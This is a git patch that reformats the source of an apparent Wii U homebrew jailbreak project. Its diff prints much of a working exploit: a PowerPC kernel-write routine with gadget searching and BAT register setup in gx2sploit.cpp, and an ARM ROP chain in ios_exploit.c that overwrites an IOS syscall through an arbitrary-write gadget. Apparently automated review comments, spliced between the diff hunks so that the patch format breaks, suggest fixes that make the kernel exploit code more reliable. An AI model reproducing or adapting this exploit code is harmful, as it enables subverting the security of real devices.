From de4405ecf9b525c460ab74acb348f91694e93e0c Mon Sep 17 00:00:00 2001 From: Maschell Date: Sat, 5 Mar 2022 17:00:58 +0100 Subject: [PATCH] Format via clang-format --- .clang-format | 67 +++ .github/workflows/ci.yml | 10 +- .github/workflows/pr.yml | 8 + README.md | 5 + source/ElfUtils.c | 35 +- source/elf_abi.h | 1 + source/gx2sploit.cpp | 146 +++--- source/gx2sploit.h | 12 +- source/ios_exploit.c | 502 ++++++++++----------- source/ios_kernel/source/elf_abi.h | 1 + source/ios_kernel/source/elf_patcher.c | 6 +- source/ios_kernel/source/elf_patcher.h | 8 +- source/ios_kernel/source/instant_patches.c | 12 +- source/ios_kernel/source/kernel_patches.c | 7 +- source/ios_kernel/source/main.c | 10 +- source/ios_kernel/source/utils.c | 2 +- source/ios_kernel/source/utils.h | 29 +- source/ios_usb/source/main.c | 3 +- source/main.cpp | 32 +- source/utils/logger.h | 10 +- 20 files changed, 502 insertions(+), 404 deletions(-) create mode 100644 .clang-format diff --git a/.clang-format b/.clang-format new file mode 100644 index 0000000..56cc685 --- /dev/null +++ b/.clang-format 
@@ -0,0 +1,67 @@ +# Generated from CLion C/C++ Code Style settings +BasedOnStyle: LLVM +AccessModifierOffset: -4 +AlignAfterOpenBracket: Align +AlignConsecutiveAssignments: Consecutive +AlignConsecutiveMacros: AcrossEmptyLinesAndComments +AlignOperands: Align +AllowAllArgumentsOnNextLine: false +AllowAllConstructorInitializersOnNextLine: false +AllowAllParametersOfDeclarationOnNextLine: false +AllowShortBlocksOnASingleLine: Always +AllowShortCaseLabelsOnASingleLine: false +AllowShortFunctionsOnASingleLine: All +AllowShortIfStatementsOnASingleLine: Always +AllowShortLambdasOnASingleLine: All +AllowShortLoopsOnASingleLine: true +AlwaysBreakAfterReturnType: None +AlwaysBreakTemplateDeclarations: Yes +BreakBeforeBraces: Custom +BraceWrapping: + AfterCaseLabel: false + AfterClass: false + AfterControlStatement: Never + AfterEnum: false + AfterFunction: false + AfterNamespace: false + AfterUnion: false + BeforeCatch: false + BeforeElse: false + IndentBraces: false + SplitEmptyFunction: false + SplitEmptyRecord: true +BreakBeforeBinaryOperators: None +BreakBeforeTernaryOperators: true +BreakConstructorInitializers: BeforeColon +BreakInheritanceList: BeforeColon +ColumnLimit: 0 +CompactNamespaces: false +ContinuationIndentWidth: 8 +IndentCaseLabels: true +IndentPPDirectives: None +IndentWidth: 4 +KeepEmptyLinesAtTheStartOfBlocks: true +MaxEmptyLinesToKeep: 2 +NamespaceIndentation: All +ObjCSpaceAfterProperty: false +ObjCSpaceBeforeProtocolList: true +PointerAlignment: Right +ReflowComments: false +SpaceAfterCStyleCast: true +SpaceAfterLogicalNot: false +SpaceAfterTemplateKeyword: false +SpaceBeforeAssignmentOperators: true +SpaceBeforeCpp11BracedList: false +SpaceBeforeCtorInitializerColon: true +SpaceBeforeInheritanceColon: true +SpaceBeforeParens: ControlStatements +SpaceBeforeRangeBasedForLoopColon: true +SpaceInEmptyParentheses: false +SpacesBeforeTrailingComments: 1 +SpacesInAngles: false +SpacesInCStyleCastParentheses: false +SpacesInContainerLiterals: false 
+SpacesInParentheses: false +SpacesInSquareBrackets: false +TabWidth: 4 +UseTab: Never diff --git a/.github/workflows/ci.yml b/.github/workflows/ci.yml index 689b413..2938346 100644 --- a/.github/workflows/ci.yml +++ b/.github/workflows/ci.yml @@ -6,8 +6,16 @@ on: - master jobs: + clang-format: + runs-on: ubuntu-18.04 + steps: + - uses: actions/checkout@v2 + - name: clang-format + run: | + docker run --rm -v ${PWD}:/src wiiuenv/clang-format:13.0.0-2 -r ./source build-binary: runs-on: ubuntu-18.04 + needs: clang-format steps: - uses: actions/checkout@v2 - name: build binary @@ -26,7 +34,7 @@ jobs: id: get_repository_name run: | echo REPOSITORY_NAME=$(echo "$GITHUB_REPOSITORY" | awk -F / '{print $2}' | sed -e "s/:refs//") >> $GITHUB_ENV - echo DATETIME=$(echo $(date '+%Y%m%d-%H%M%S')) >> $GITHUB_ENV + echo DATETIME=$(echo $(date '+%Y%m%d-%H%M%S')) >> $GITHUB_ENV - uses: actions/download-artifact@master with: name: binary diff --git a/.github/workflows/pr.yml b/.github/workflows/pr.yml index f907f7e..7464b72 100644 --- a/.github/workflows/pr.yml +++ b/.github/workflows/pr.yml @@ -3,8 +3,16 @@ name: CI-PR on: [pull_request] jobs: + clang-format: + runs-on: ubuntu-18.04 + steps: + - uses: actions/checkout@v2 + - name: clang-format + run: | + docker run --rm -v ${PWD}:/src wiiuenv/clang-format:13.0.0-2 -r ./source build-binary: runs-on: ubuntu-18.04 + needs: clang-format steps: - uses: actions/checkout@v2 - name: build binary diff --git a/README.md b/README.md index 948fdbc..8066176 100644 --- a/README.md +++ b/README.md @@ -63,6 +63,11 @@ docker run -it --rm -v ${PWD}:/project payloadfromrpx-builder make docker run -it --rm -v ${PWD}:/project payloadfromrpx-builder make clean ``` + +## Format the code via docker + +`docker run --rm -v ${PWD}:/src wiiuenv/clang-format:13.0.0-2 -r ./source -i` + ## Credits - orboditilt - Maschell diff --git a/source/ElfUtils.c b/source/ElfUtils.c index 51b0851..9dce42d 100644 --- a/source/ElfUtils.c +++ b/source/ElfUtils.c 
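Review bot: The new `clang-format` job pulls `wiiuenv/clang-format:13.0.0-2` by a mutable tag, and the `actions/download-artifact@master` step left as context in the second `ci.yml` hunk tracks a moving branch, so neither step is reproducible or protected against the tag or branch being repointed. Pin the image by digest (`wiiuenv/clang-format:13.0.0-2@sha256:<digest>`) and the actions to a release tag or commit SHA, e.g. `- uses: actions/download-artifact@v2`, and note that `build-binary` now carries `needs: clang-format`, so a bad or unavailable image also blocks every build. The same unpinned image line is duplicated in `pr.yml`. The `${PWD}` mount should be quoted as `-v "${PWD}":/src` so a checkout path containing spaces does not split the argument.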
@@ -1,19 +1,19 @@ #include #include -#include #include +#include #include -#include +#include #include #include -#include +#include #include "elf_abi.h" int32_t LoadFileToMem(const char *relativefilepath, char **fileOut, uint32_t *sizeOut) { char path[256]; - int result = 0; + int result = 0; char *sdRootPath = ""; if (!WHBMountSdCard()) { DEBUG_FUNCTION_LINE("Failed to mount SD Card..."); @@ -33,7 +33,7 @@ int32_t LoadFileToMem(const char *relativefilepath, char **fileOut, uint32_t *si goto exit; } - exit: +exit: WHBUnmountSdCard(); return result; } @@ -41,7 +41,7 @@ int32_t LoadFileToMem(const char *relativefilepath, char **fileOut, uint32_t *si static void InstallMain(void *data_elf); uint32_t load_loader_elf_from_sd(unsigned char *baseAddress, const char *relativePath) { - char *elf_data = NULL; + char *elf_data = NULL; uint32_t fileSize = 0; if (LoadFileToMem(relativePath, &elf_data, &fileSize) != 0) { return 0; @@ -61,10 +61,7 @@ uint32_t load_loader_elf_from_sd(unsigned char *baseAddress, const char *relativ static unsigned int get_section(unsigned char *data, const char *name, unsigned int *size, unsigned int *addr, int fail_on_not_found) { Elf32_Ehdr *ehdr = (Elf32_Ehdr *) data; - if (!data - || !IS_ELF (*ehdr) - || (ehdr->e_type != ET_EXEC) - || (ehdr->e_machine != EM_PPC)) { + if (!data || !IS_ELF(*ehdr) || (ehdr->e_type != ET_EXEC) || (ehdr->e_machine != EM_PPC)) { OSFatal("Invalid elf file"); } 
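Review bot: `get_section` receives `data` with no length, so the reflowed header check in this hunk can validate only `e_ident`, `e_type` and `e_machine`; it cannot confirm that the buffer holds a full `Elf32_Ehdr`, let alone that the section table the function presumably walks afterwards (outside this hunk) lies inside the bytes actually read from the SD card. `LoadFileToMem` already reports a `sizeOut`, so thread it through, e.g. `static unsigned int get_section(unsigned char *data, unsigned int data_len, const char *name, unsigned int *size, unsigned int *addr, int fail_on_not_found)`, and reject headers whose `e_shoff`, `e_shnum` or `e_shstrndx` point past `data_len` before indexing them. Without that a truncated or crafted `.elf` on the card turns the later copies in `InstallMain` into out-of-bounds reads instead of the intended `OSFatal`. The body of `get_section` continues past the end of this hunk.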
@@ -96,9 +93,9 @@ static unsigned int get_section(unsigned char *data, const char *name, unsigned static void InstallMain(void *data_elf) { // get .text section unsigned int main_text_addr = 0; - unsigned int main_text_len = 0; + unsigned int main_text_len = 0; unsigned int section_offset = get_section(data_elf, ".text", &main_text_len, &main_text_addr, 1); - unsigned char *main_text = data_elf + section_offset; + unsigned char *main_text = data_elf + section_offset; /* Copy main .text to memory */ if (section_offset > 0) { DEBUG_FUNCTION_LINE("Copy section to %08X from %08X (size: %d)", main_text_addr, main_text, main_text_len); @@ -110,21 +107,20 @@ static void InstallMain(void *data_elf) { // get the .rodata section unsigned int main_rodata_addr = 0; - unsigned int main_rodata_len = 0; - section_offset = get_section(data_elf, ".rodata", &main_rodata_len, &main_rodata_addr, 0); + unsigned int main_rodata_len = 0; + section_offset = get_section(data_elf, ".rodata", &main_rodata_len, &main_rodata_addr, 0); if (section_offset > 0) { unsigned char *main_rodata = data_elf + section_offset; /* Copy main rodata to memory */ memcpy((void *) (main_rodata_addr), (void *) main_rodata, main_rodata_len); DCFlushRange((void *) main_rodata_addr, main_rodata_len); ICInvalidateRange((void *) main_rodata_addr, main_rodata_len); - } // get the .data section unsigned int main_data_addr = 0; - unsigned int main_data_len = 0; - section_offset = get_section(data_elf, ".data", &main_data_len, &main_data_addr, 0); + unsigned int main_data_len = 0; + section_offset = get_section(data_elf, ".data", &main_data_len, &main_data_addr, 0); if (section_offset > 0) { unsigned char *main_data = data_elf + section_offset; /* Copy main data to memory */ 
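Review bot: The `memcpy` destinations in these hunks (`main_text_addr`, and below it `main_rodata_addr` and `main_data_addr`) are the `addr` values `get_section` reports from the file's own section headers (the lookup itself is outside this diff), and `InstallMain(void *data_elf)` receives nothing else, so the `baseAddress` that `load_loader_elf_from_sd` accepts cannot be used here to bound them; a mis-built or tampered `.elf` on the SD card can direct the copy at any address. Consider validating each `(addr, len)` pair against the region the loader is meant to occupy before the copy and calling `OSFatal` on a mismatch, the same way the header is rejected. Separately, `unsigned char *main_text = data_elf + section_offset;` does pointer arithmetic on a `void *`, which is a GNU extension; `(unsigned char *) data_elf + section_offset` is portable and matches the declared type. The `%08X` conversion of the pointer `main_text` in the `DEBUG_FUNCTION_LINE` call is only correct on this 32-bit target; `%p` would be the portable choice if the macro is printf-style, which the diff does not show.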
@@ -135,8 +131,8 @@ static void InstallMain(void *data_elf) { // get the .bss section unsigned int main_bss_addr = 0; - unsigned int main_bss_len = 0; - section_offset = get_section(data_elf, ".bss", &main_bss_len, &main_bss_addr, 0); + unsigned int main_bss_len = 0; + section_offset = get_section(data_elf, ".bss", &main_bss_len, &main_bss_addr, 0); if (section_offset > 0) { unsigned char *main_bss = data_elf + section_offset; /* Copy main data to memory */ @@ -144,5 +140,4 @@ static void InstallMain(void *data_elf) { DCFlushRange((void *) main_bss_addr, main_bss_len); ICInvalidateRange((void *) main_bss_addr, main_bss_len); } - } diff --git a/source/elf_abi.h b/source/elf_abi.h index 4d9c796..aa119af 100644 --- a/source/elf_abi.h +++ b/source/elf_abi.h @@ -1,3 +1,4 @@ +// clang-format off /* * Copyright (c) 1995, 1996, 2001, 2002 * Erik Theisen. All rights reserved. diff --git a/source/gx2sploit.cpp b/source/gx2sploit.cpp index df291ba..77cb57e 100644 --- a/source/gx2sploit.cpp +++ b/source/gx2sploit.cpp 
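Review bot: The `.bss` block keeps the `.data` pattern — it derives `main_bss = data_elf + section_offset` and, judging by the `DCFlushRange((void *) main_bss_addr, main_bss_len)` in the following hunk, copies `main_bss_len` bytes from there — but `.bss` is a `SHT_NOBITS` section with no file contents, so the bytes at its `sh_offset` belong to whatever follows in the file or lie past its end, and the copy can read beyond the loaded buffer. The line that performs the copy sits between the two hunks, so this is inferred; if it is a `memcpy` like the `.data` one, replace it with `memset((void *) main_bss_addr, 0, main_bss_len);` and keep the cache flush. The copied-over `/* Copy main data to memory */` comment above it should then read `/* Zero .bss */`.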
@@ -1,34 +1,33 @@ -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include "ElfUtils.h" #include "gx2sploit.h" +#include "ElfUtils.h" +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include -#define JIT_ADDRESS 0x01800000 +#define JIT_ADDRESS 0x01800000 -#define KERN_HEAP 0xFF200000 -#define KERN_HEAP_PHYS 0x1B800000 +#define KERN_HEAP 0xFF200000 +#define KERN_HEAP_PHYS 0x1B800000 -#define KERN_CODE_READ 0xFFF023D4 -#define KERN_CODE_WRITE 0xFFF023F4 -#define KERN_DRVPTR 0xFFEAB530 +#define KERN_CODE_READ 0xFFF023D4 +#define KERN_CODE_WRITE 0xFFF023F4 +#define KERN_DRVPTR 0xFFEAB530 -#define STARTID_OFFSET 0x08 -#define METADATA_OFFSET 0x14 -#define METADATA_SIZE 0x10 +#define STARTID_OFFSET 0x08 +#define METADATA_OFFSET 0x14 +#define METADATA_SIZE 0x10 extern "C" void SCKernelCopyData(uint32_t addr, uint32_t src, uint32_t len); @@ -49,24 +48,23 @@ static void *find_gadget(uint32_t code[], uint32_t length, uint32_t gadgets_star /* Chadderz's kernel write function */ void __attribute__((noinline)) kern_write(const void *addr, uint32_t value) { - asm volatile ( - "li 3,1\n" - "li 4,0\n" - "mr 5,%1\n" - "li 6,0\n" - "li 7,0\n" - "lis 8,1\n" - "mr 9,%0\n" - "mr %1,1\n" - "li 0,0x3500\n" - "sc\n" - "nop\n" - "mr 1,%1\n" - : - : "r"(addr), "r"(value) - : "memory", "ctr", "lr", "0", "3", "4", "5", "6", "7", "8", "9", "10", - "11", "12" - ); + asm volatile( + "li 3,1\n" + "li 4,0\n" + "mr 5,%1\n" + "li 6,0\n" + "li 7,0\n" + "lis 8,1\n" + "mr 9,%0\n" + "mr %1,1\n" + "li 0,0x3500\n" + "sc\n" + "nop\n" + "mr 1,%1\n" + : + : "r"(addr), "r"(value) + : "memory", "ctr", "lr", "0", "3", "4", "5", "6", "7", "8", "9", "10", + "11", "12"); } extern "C" void OSSwitchSecCodeGenMode(int); 
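Review bot: The asm in `kern_write` writes to its input-only operand `%1` (`mr %1,1` stashes the stack pointer in the register holding `value`, and `mr 1,%1` restores from it), which GCC's extended-asm rules forbid for operands that appear only in the input list; the compiler is free to assume that register still holds `value` afterwards and reuse it, and the reformat does not change that. Declare `value` as a read-write operand so the clobber is known, and renumber the template to match. `r1` is also modified and restored inside the asm without appearing in the clobber list, which is unavoidable for the stack pointer but deserves a comment since a reader cannot tell it from the constraint lists.
```cpp
    asm volatile(
            // … unchanged: li 3,1 / li 4,0 …
            "mr 5,%0\n" // value is now operand 0
            // … unchanged: li 6,0 / li 7,0 / lis 8,1 …
            "mr 9,%1\n" // addr is now operand 1
            "mr %0,1\n" // stash r1 in value's register; it is clobbered, hence "+r"
            // … unchanged: li 0,0x3500 / sc / nop …
            "mr 1,%0\n" // restore r1 (the stack pointer cannot be listed as a clobber)
            : "+r"(value)
            : "r"(addr)
            // … unchanged: clobber list …
    );
```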
@@ -75,7 +73,7 @@ int exploitThread(int argc, char **argv) { OSDynLoad_Module gx2_handle; OSDynLoad_Acquire("gx2.rpl", &gx2_handle); - void (*pGX2SetSemaphore)(uint64_t *sem, int action); + void (*pGX2SetSemaphore)(uint64_t * sem, int action); OSDynLoad_FindExport(gx2_handle, 0, "GX2SetSemaphore", (void **) &pGX2SetSemaphore); uint32_t set_semaphore = ((uint32_t) pGX2SetSemaphore) + 0x2C; @@ -98,16 +96,16 @@ int exploitThread(int argc, char **argv) { /* Set the kernel heap metadata entry */ uint32_t *metadata = (uint32_t *) (KERN_HEAP + METADATA_OFFSET + (0x02000000 * METADATA_SIZE)); - metadata[0] = (uint32_t) drvhax; - metadata[1] = (uint32_t) -0x4c; - metadata[2] = (uint32_t) -1; - metadata[3] = (uint32_t) -1; + metadata[0] = (uint32_t) drvhax; + metadata[1] = (uint32_t) -0x4c; + metadata[2] = (uint32_t) -1; + metadata[3] = (uint32_t) -1; /* Find stuff */ - uint32_t gx2data[] = {0xfc2a0000}; - uint32_t gx2data_addr = (uint32_t) find_gadget(gx2data, 0x04, 0x10000000); - uint32_t doflush[] = {0xba810008, 0x8001003c, 0x7c0803a6, 0x38210038, 0x4e800020, 0x9421ffe0, 0xbf61000c, 0x7c0802a6, 0x7c7e1b78, 0x7c9f2378, 0x90010024}; - void (*do_flush)(uint32_t arg0, uint32_t arg1) = (void (*)(uint32_t, uint32_t)) (((uint32_t) find_gadget(doflush, 0x2C, 0x01000000)) + 0x14); + uint32_t gx2data[] = {0xfc2a0000}; + uint32_t gx2data_addr = (uint32_t) find_gadget(gx2data, 0x04, 0x10000000); + uint32_t doflush[] = {0xba810008, 0x8001003c, 0x7c0803a6, 0x38210038, 0x4e800020, 0x9421ffe0, 0xbf61000c, 0x7c0802a6, 0x7c7e1b78, 0x7c9f2378, 0x90010024}; + void (*do_flush)(uint32_t arg0, uint32_t arg1) = (void (*)(uint32_t, uint32_t))(((uint32_t) find_gadget(doflush, 0x2C, 0x01000000)) + 0x14); /* Modify a next ptr on the heap */ uint32_t kpaddr = KERN_HEAP_PHYS + STARTID_OFFSET; 
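Review bot: `OSDynLoad_Acquire` and `OSDynLoad_FindExport` are called without checking their results, so if `gx2.rpl` cannot be acquired or `GX2SetSemaphore` is not exported, `pGX2SetSemaphore` stays uninitialised (it has no initialiser) and `set_semaphore = ((uint32_t) pGX2SetSemaphore) + 0x2C` becomes a garbage code address that the rest of the exploit then works from. Initialise the pointer and bail out when the lookup fails, e.g. `void (*pGX2SetSemaphore)(uint64_t *sem, int action) = nullptr;` followed by `if (OSDynLoad_FindExport(gx2_handle, 0, "GX2SetSemaphore", (void **) &pGX2SetSemaphore) != 0 || pGX2SetSemaphore == nullptr) return -1;`, assuming the zero-on-success convention for these calls, which the diff does not show. The `uint64_t * sem` spacing in the function-pointer parameter looks like a formatter artefact rather than intent; a `typedef` for the callback type would sidestep it. `exploitThread` continues beyond this hunk.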
@@ -186,15 +184,23 @@ static void SCSetupIBAT4DBAT5() { // 00800000-01000000 => 30800000-31000000 (read/write, user/supervisor) unsigned int ibat4u = 0x008000FF; unsigned int ibat4l = 0x30800012; - asm volatile("mtspr 560, %0" : : "r" (ibat4u)); - asm volatile("mtspr 561, %0" : : "r" (ibat4l)); + asm volatile("mtspr 560, %0" + : + : "r"(ibat4u)); + asm volatile("mtspr 561, %0" + : + : "r"(ibat4l)); // Give our and the kernel full data access rights. // 00800000-01000000 => 30800000-31000000 (read/write, user/supervisor) unsigned int dbat5u = ibat4u; unsigned int dbat5l = ibat4l; - asm volatile("mtspr 570, %0" : : "r" (dbat5u)); - asm volatile("mtspr 571, %0" : : "r" (dbat5l)); + asm volatile("mtspr 570, %0" + : + : "r"(dbat5u)); + asm volatile("mtspr 571, %0" + : + : "r"(dbat5l)); asm volatile("eieio; isync"); } @@ -205,13 +211,13 @@ int DoKernelExploit(void) { DEBUG_FUNCTION_LINE("Running GX2Sploit"); /* Make a thread to modify the semaphore */ OSThread *thread = (OSThread *) memalign(8, 0x1000); - uint8_t *stack = (uint8_t *) memalign(0x40, 0x2000); + uint8_t *stack = (uint8_t *) memalign(0x40, 0x2000); OSSwitchSecCodeGenMode(0); memcpy((void *) 0x1800000, (void *) &SCKernelCopyData, 0x100); unsigned int setIBAT0Addr = 0x1800200; - unsigned int *curAddr = (uint32_t *) setIBAT0Addr; + unsigned int *curAddr = (uint32_t *) setIBAT0Addr; curAddr[0] = 0x7C0006AC; curAddr[1] = 0x4C00012C; 
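Review bot: Both `memalign` calls in `DoKernelExploit` (the `OSThread` and its `stack`) go unchecked, and the literal `0x1800000` passed to `memcpy` duplicates the `JIT_ADDRESS` macro defined at the top of this file, so the destination of the copied `SCKernelCopyData` code and the macro can silently drift apart. Add `if (thread == nullptr || stack == nullptr) return -1;` (or whatever failure value the caller expects; the return handling is outside this hunk) before the buffers are used, and write `memcpy((void *) JIT_ADDRESS, (void *) &SCKernelCopyData, 0x100);`. The `0x100` copied out of `SCKernelCopyData` is an assumption about that routine's size that nothing here verifies; a one-line comment saying where the figure comes from would help the next reader. `DoKernelExploit` continues past the end of this hunk.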
@@ -241,18 +247,18 @@ int DoKernelExploit(void) { uint32_t targetAddress = 0x017FF000; KernelWrite((uint32_t) backupBuffer, (void *) 0x017FF000, 0x40); - targetBuffer[0] = 0x7c7082a6; // mfspr r3, 528 - targetBuffer[1] = 0x60630003; // ori r3, r3, 0x03 - targetBuffer[2] = 0x7c7083a6; // mtspr 528, r3 - targetBuffer[3] = 0x7c7282a6; // mfspr r3, 530 - targetBuffer[4] = 0x60630003; // ori r3, r3, 0x03 - targetBuffer[5] = 0x7c7283a6; // mtspr 530, r3 - targetBuffer[6] = 0x7c0006ac; // eieio - targetBuffer[7] = 0x4c00012c; // isync - targetBuffer[8] = 0x3c600000 | (((uint32_t) SCSetupIBAT4DBAT5) >> 16); // lis r3, setup_syscall@h - targetBuffer[9] = 0x60630000 | (((uint32_t) SCSetupIBAT4DBAT5) & 0xFFFF); // ori r3, r3, setup_syscall@l - targetBuffer[10] = 0x7c6903a6; // mtctr r3 - targetBuffer[11] = 0x4e800420; // bctr + targetBuffer[0] = 0x7c7082a6; // mfspr r3, 528 + targetBuffer[1] = 0x60630003; // ori r3, r3, 0x03 + targetBuffer[2] = 0x7c7083a6; // mtspr 528, r3 + targetBuffer[3] = 0x7c7282a6; // mfspr r3, 530 + targetBuffer[4] = 0x60630003; // ori r3, r3, 0x03 + targetBuffer[5] = 0x7c7283a6; // mtspr 530, r3 + targetBuffer[6] = 0x7c0006ac; // eieio + targetBuffer[7] = 0x4c00012c; // isync + targetBuffer[8] = 0x3c600000 | (((uint32_t) SCSetupIBAT4DBAT5) >> 16); // lis r3, setup_syscall@h + targetBuffer[9] = 0x60630000 | (((uint32_t) SCSetupIBAT4DBAT5) & 0xFFFF); // ori r3, r3, setup_syscall@l + targetBuffer[10] = 0x7c6903a6; // mtctr r3 + targetBuffer[11] = 0x4e800420; // bctr DCFlushRange(targetBuffer, sizeof(targetBuffer)); KernelWrite((uint32_t) targetAddress, (void *) targetBuffer, 0x40); diff --git a/source/gx2sploit.h b/source/gx2sploit.h index a294363..d99eb92 100644 --- a/source/gx2sploit.h +++ b/source/gx2sploit.h 
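Review bot: `targetAddress` is assigned `0x017FF000` and the very next line repeats the literal instead of using it (`KernelWrite((uint32_t) backupBuffer, (void *) 0x017FF000, 0x40)`), and the length `0x40` is hard-coded in both `KernelWrite` calls while only twelve words (0x30 bytes) of `targetBuffer` are populated in this hunk; whether the buffer really is 0x40 bytes depends on its declaration outside the hunk. Use the named variable and the real size so the two cannot diverge: `KernelWrite((uint32_t) backupBuffer, (void *) targetAddress, sizeof(targetBuffer));` and `KernelWrite(targetAddress, (void *) targetBuffer, sizeof(targetBuffer));`, with a `static_assert(sizeof(targetBuffer) == 0x40, "patch site is 0x40 bytes");` if the size is a requirement of the patched location. The function continues outside this hunk.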
@@ -4,11 +4,13 @@ extern "C" { #endif -#define KERN_SYSCALL_TBL_1 0xFFE84C70 // unknown -#define KERN_SYSCALL_TBL_2 0xFFE85070 // works with games -#define KERN_SYSCALL_TBL_3 0xFFE85470 // works with loader -#define KERN_SYSCALL_TBL_4 0xFFEAAA60 // works with home menu -#define KERN_SYSCALL_TBL_5 0xFFEAAE60 // works with browser (previously KERN_SYSCALL_TBL) +#include + +#define KERN_SYSCALL_TBL_1 0xFFE84C70 // unknown +#define KERN_SYSCALL_TBL_2 0xFFE85070 // works with games +#define KERN_SYSCALL_TBL_3 0xFFE85470 // works with loader +#define KERN_SYSCALL_TBL_4 0xFFEAAA60 // works with home menu +#define KERN_SYSCALL_TBL_5 0xFFEAAE60 // works with browser (previously KERN_SYSCALL_TBL) int DoKernelExploit(void); diff --git a/source/ios_exploit.c b/source/ios_exploit.c index e98ef60..7e5463c 100644 --- a/source/ios_exploit.c +++ b/source/ios_exploit.c @@ -1,15 +1,15 @@ -#include -#include -#include -#include -#include #include "ios_exploit.h" +#include +#include +#include +#include +#include -#define CHAIN_START 0x1016AD40 -#define SOURCE (0x120000) -#define IOS_CREATETHREAD 0x1012EABC -#define ARM_CODE_BASE 0x08135000 -#define REPLACE_SYSCALL 0x081298BC +#define CHAIN_START 0x1016AD40 +#define SOURCE (0x120000) +#define IOS_CREATETHREAD 0x1012EABC +#define ARM_CODE_BASE 0x08135000 +#define REPLACE_SYSCALL 0x081298BC static void uhs_exploit_init(int uhs_handle); @@ -17,7 +17,7 @@ static int uhs_write32(int uhs_handle, int arm_addr, int val); //!------Variables used in exploit------ static int *pretend_root_hub = (int *) 0xF5003ABC; -static int *ayylmao = (int *) 0xF4500000; +static int *ayylmao = (int *) 0xF4500000; //!------------------------------------- typedef struct __attribute__((packed)) { 
@@ -31,266 +31,266 @@ typedef struct __attribute__((packed)) { /* ROP CHAIN STARTS HERE (0x1015BD78) */ static const int final_chain[] = { - 0x101236f3, // 0x00 POP {R1-R7,PC} - 0x0, // 0x04 arg - 0x0812974C, // 0x08 stackptr CMP R3, #1; STREQ R1, [R12]; BX LR - 0x68, // 0x0C stacksize - 0x10101638, // 0x10 - 0x0, // 0x14 - 0x0, // 0x18 - 0x0, // 0x1C - 0x1010388C, // 0x20 CMP R3, #0; MOV R0, R4; LDMNEFD SP!, {R4,R5,PC} - 0x0, // 0x24 - 0x0, // 0x28 - 0x1012CFEC, // 0x2C MOV LR, R0; MOV R0, LR; ADD SP, SP, #8; LDMFD SP!, {PC} - 0x0, // 0x30 - 0x0, // 0x34 - IOS_CREATETHREAD, // 0x38 - 0x1, // 0x3C - 0x2, // 0x40 - 0x10123a9f, // 0x44 POP {R0,R1,R4,PC} + 0x101236f3, // 0x00 POP {R1-R7,PC} + 0x0, // 0x04 arg + 0x0812974C, // 0x08 stackptr CMP R3, #1; STREQ R1, [R12]; BX LR + 0x68, // 0x0C stacksize + 0x10101638, // 0x10 + 0x0, // 0x14 + 0x0, // 0x18 + 0x0, // 0x1C + 0x1010388C, // 0x20 CMP R3, #0; MOV R0, R4; LDMNEFD SP!, {R4,R5,PC} + 0x0, // 0x24 + 0x0, // 0x28 + 0x1012CFEC, // 0x2C MOV LR, R0; MOV R0, LR; ADD SP, SP, #8; LDMFD SP!, {PC} + 0x0, // 0x30 + 0x0, // 0x34 + IOS_CREATETHREAD, // 0x38 + 0x1, // 0x3C + 0x2, // 0x40 + 0x10123a9f, // 0x44 POP {R0,R1,R4,PC} REPLACE_SYSCALL + 0x00, // 0x48 address: the beginning of syscall_0x1a (IOS_GetUpTime64) - 0xE92D4010, // 0x4C value: PUSH {R4,LR} - 0x0, // 0x50 - 0x10123a8b, // 0x54 POP {R3,R4,PC} - 0x1, // 0x58 R3 must be 1 for the arbitrary write - 0x0, // 0x5C - 0x1010CD18, // 0x60 MOV R12, R0; MOV R0, R12; ADD SP, SP, #8; LDMFD SP!, {PC} - 0x0, // 0x64 - 0x0, // 0x68 - 0x1012EE64, // 0x6C set_panic_behavior (arbitrary write) - 0x0, // 0x70 - 0x0, // 0x74 - 0x10123a9f, // 0x78 POP {R0,R1,R4,PC} + 0xE92D4010, // 0x4C value: PUSH {R4,LR} + 0x0, // 0x50 + 0x10123a8b, // 0x54 POP {R3,R4,PC} + 0x1, // 0x58 R3 must be 1 for the arbitrary write + 0x0, // 0x5C + 0x1010CD18, // 0x60 MOV R12, R0; MOV R0, R12; ADD SP, SP, #8; LDMFD SP!, {PC} + 0x0, // 0x64 + 0x0, // 0x68 + 0x1012EE64, // 0x6C set_panic_behavior (arbitrary write) 
+ 0x0, // 0x70 + 0x0, // 0x74 + 0x10123a9f, // 0x78 POP {R0,R1,R4,PC} REPLACE_SYSCALL + 0x04, // 0x7C address: the beginning of syscall_0x1a (IOS_GetUpTime64) - 0xE1A04000, // 0x80 value: MOV R4, R0 - 0x0, // 0x84 - 0x10123a8b, // 0x88 POP {R3,R4,PC} - 0x1, // 0x8C R3 must be 1 for the arbitrary write - 0x0, // 0x90 - 0x1010CD18, // 0x94 MOV R12, R0; MOV R0, R12; ADD SP, SP, #8; LDMFD SP!, {PC} - 0x0, // 0x98 - 0x0, // 0x9C - 0x1012EE64, // 0xA0 set_panic_behavior (arbitrary write) - 0x0, // 0xA4 - 0x0, // 0xA8 - 0x10123a9f, // 0xAC POP {R0,R1,R4,PC} + 0xE1A04000, // 0x80 value: MOV R4, R0 + 0x0, // 0x84 + 0x10123a8b, // 0x88 POP {R3,R4,PC} + 0x1, // 0x8C R3 must be 1 for the arbitrary write + 0x0, // 0x90 + 0x1010CD18, // 0x94 MOV R12, R0; MOV R0, R12; ADD SP, SP, #8; LDMFD SP!, {PC} + 0x0, // 0x98 + 0x0, // 0x9C + 0x1012EE64, // 0xA0 set_panic_behavior (arbitrary write) + 0x0, // 0xA4 + 0x0, // 0xA8 + 0x10123a9f, // 0xAC POP {R0,R1,R4,PC} REPLACE_SYSCALL + 0x08, // 0xB0 address: the beginning of syscall_0x1a (IOS_GetUpTime64) - 0xE3E00000, // 0xB4 value: MOV R0, #0xFFFFFFFF - 0x0, // 0xB8 - 0x10123a8b, // 0xBC POP {R3,R4,PC} - 0x1, // 0xC0 R3 must be 1 for the arbitrary write - 0x0, // 0xC4 - 0x1010CD18, // 0xC8 MOV R12, R0; MOV R0, R12; ADD SP, SP, #8; LDMFD SP!, {PC} - 0x0, // 0xCC - 0x0, // 0xD0 - 0x1012EE64, // 0xD4 set_panic_behavior (arbitrary write) - 0x0, // 0xD8 - 0x0, // 0xDC - 0x10123a9f, // 0xE0 POP {R0,R1,R4,PC} + 0xE3E00000, // 0xB4 value: MOV R0, #0xFFFFFFFF + 0x0, // 0xB8 + 0x10123a8b, // 0xBC POP {R3,R4,PC} + 0x1, // 0xC0 R3 must be 1 for the arbitrary write + 0x0, // 0xC4 + 0x1010CD18, // 0xC8 MOV R12, 